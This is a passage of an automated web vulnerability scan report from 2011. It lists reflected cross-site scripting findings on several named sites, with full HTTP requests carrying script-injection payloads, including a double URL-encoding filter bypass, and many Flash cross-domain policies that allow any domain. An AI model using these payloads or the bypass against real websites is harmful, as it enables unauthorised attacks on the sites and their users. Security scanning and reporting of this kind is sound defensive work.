Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b53f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5819d5c5d30 was submitted in the REST URL parameter 1. This input was echoed as 7b53f"><script>alert(1)</script>5819d5c5d30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico7b53f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5819d5c5d30 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dbfx.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 02:46:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash01
X-AspNet-Version: 2.0.50727
Content-Length: 198
Location: http://www.e-forex.com/favicon.ico7b53f"><script>alert(1)</script>5819d5c5d30
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.e-forex.com/favicon.ico7b53f"><script>alert(1)</script>5819d5c5d30">here</a>.</body>

5.25. http://www.dbfx.net/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbfx.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5aed"><script>alert(1)</script>a73e5cf0ad8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dbfx.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 02:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 201
Location: http://www.e-forex.com/favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.e-forex.com/favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1">here</a>.</body>
...[SNIP]...

5.26. http://www.herbdoc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herbdoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b6685><script>alert(1)</script>4d07e5c9c45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icob6685><script>alert(1)</script>4d07e5c9c45 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herbdoc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: Apache
Connection: close
Content-Type: text/html
Location: https://www.herbdoc.com//favicon.icob6685><script>alert(1)</script>4d07e5c9c45

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>The Document has moved <A HREF=https://www.herbdoc.com//favicon.icob6685><script>alert(1)</script>4d07e5c9c45>
...[SNIP]...

5.27. http://www.herbdoc.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herbdoc.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 26482><script>alert(1)</script>135ba67191a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?26482><script>alert(1)</script>135ba67191a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herbdoc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: Apache
Connection: close
Content-Type: text/html
Location: https://www.herbdoc.com//favicon.ico?26482><script>alert(1)</script>135ba67191a=1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>The Document has moved <A HREF=https://www.herbdoc.com//favicon.ico?26482><script>alert(1)</script>135ba67191a=1>
...[SNIP]...

5.28. http://www.mannatech.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mannatech.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ee5"><script>alert(1)</script>a9efa941b56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mannatech.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 260
Location: https://www.mannatech.com/favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:17:50 GMT
Connection: close

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.mannatech.com/favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56">
...[SNIP]...

5.29. http://www.mannatech.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mannatech.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472db"><script>alert(1)</script>5fb6f99eb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mannatech.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 263
Location: https://www.mannatech.com/favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:17:45 GMT
Connection: close

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.mannatech.com/favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1">
...[SNIP]...

5.30. http://www.rachelray.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rachelray.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41cd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5a37004a68 was submitted in the REST URL parameter 1. This input was echoed as 41cd2"><script>alert(1)</script>a5a37004a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico41cd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5a37004a68 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rachelray.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash06
X-AspNet-Version: 2.0.50727
Content-Length: 195
Location: http://rachelray.in/favicon.ico41cd2"><script>alert(1)</script>a5a37004a68
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://rachelray.in/favicon.ico41cd2"><script>alert(1)</script>a5a37004a68">here</a>.</body>

5.31. http://www.rachelray.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rachelray.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da84"><script>alert(1)</script>c352ba45b47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rachelray.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 198
Location: http://rachelray.in/favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://rachelray.in/favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1">here</a>.</body>

6. Flash cross-domain policy  previous  next
There are 263 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.2. http://www.1888932-2946.ws/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.1888932-2946.ws
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1888932-2946.ws

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 20:13:59 GMT
Accept-Ranges: bytes
ETag: "a43e439344afca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:14:44 GMT
Connection: close
Content-Length: 217

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cro
...[SNIP]...

6.3. http://www.1iota.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.1iota.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1iota.com

Response

HTTP/1.1 200 OK
Content-Length: 204
Content-Type: text/xml
Content-Location: http://www.1iota.com/crossdomain.xml
Last-Modified: Fri, 21 Jan 2011 22:41:29 GMT
Accept-Ranges: bytes
ETag: "98c1a58bcb9cb1:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.4. http://www.3dvo-models.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.3dvo-models.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.3dvo-models.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 31 Aug 2009 18:01:10 GMT
ETag: "f53c216-9c-47273d1974580"
Accept-Ranges: bytes
Content-Length: 156
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>

6.5. http://www.55krc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.55krc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.55krc.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3187036575
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 00:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 00:51:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.6. http://www.950kjr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.950kjr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.950kjr.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188587186 3188459094
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:38:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://www.955thegame.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.955thegame.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.955thegame.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:33 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Wed, 23 Apr 2008 18:04:28 GMT
ETag: "18936-125-480f7a2c"
Accept-Ranges: bytes
Content-Length: 293
Keep-Alive: timeout=5
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerRadio_Pool=3541059651.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-
...[SNIP]...

6.8. http://www.abc-7.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc-7.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc-7.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9f2"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 04:17:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 04:17:39 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.9. http://www.activitytv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.activitytv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.activitytv.com

Response

HTTP/1.1 200 OK
Content-Length: 81
Content-Type: text/xml
Content-Location: http://www.activitytv.com/crossdomain.xml
Last-Modified: Wed, 10 Sep 2008 20:41:37 GMT
Accept-Ranges: bytes
ETag: "8096a59e8513c91:2c72"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:41 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.10. http://www.adjack.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adjack.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adjack.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 21:03:41 GMT
Accept-Ranges: bytes
ETag: "9fb0468f7d9ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:42 GMT
Connection: close
Content-Length: 271

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control per
...[SNIP]...

6.11. http://www.admaximizer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.admaximizer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.admaximizer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:42 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 06 Oct 2010 21:42:50 GMT
Accept-Ranges: bytes
Content-Length: 214
P3P: policyref="http://www.admaximizer.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND COM NAV"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure='false' />
</cross-d
...[SNIP]...

6.12. http://www.advancedministry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advancedministry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.advancedministry.com

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/xml
Content-Location: http://www.advancedministry.com/crossdomain.xml
Last-Modified: Tue, 25 Nov 2008 18:31:10 GMT
Accept-Ranges: bytes
ETag: "d8994fd2b4fc91:1d36"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:17:21 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-doma
...[SNIP]...

6.13. http://www.affiliatecashpile.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.affiliatecashpile.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.affiliatecashpile.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:00 GMT
Server: Apache/2.2.17 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Mon, 14 Dec 2009 23:15:56 GMT
ETag: "ba8049-fb-47ab8749f2300"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

6.14. http://www.aids.gov/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aids.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aids.gov

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 03:43:48 GMT
Content-type: text/xml
Last-modified: Tue, 03 May 2011 15:13:22 GMT
Content-length: 214
Etag: "d6-4dc01b92"
Accept-ranges: bytes
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-
...[SNIP]...

6.15. http://www.airbus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.airbus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.airbus.com

Response

HTTP/1.1 200 OK
Content-Length: 292
Content-Type: application/xml
ETag: "1f861-124-47947d7dbfe4e"
Last-Modified: Thu, 26 Nov 2009 15:29:38 GMT
Accept-Ranges: bytes
Server: Apache
Date: Wed, 04 May 2011 01:56:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow
...[SNIP]...

6.16. http://www.alpha-vip.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alpha-vip.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.alpha-vip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:47 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 18:56:33 GMT
ETag: "ff28-159-494167bbcba40"
Accept-Ranges: bytes
Content-Length: 345
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
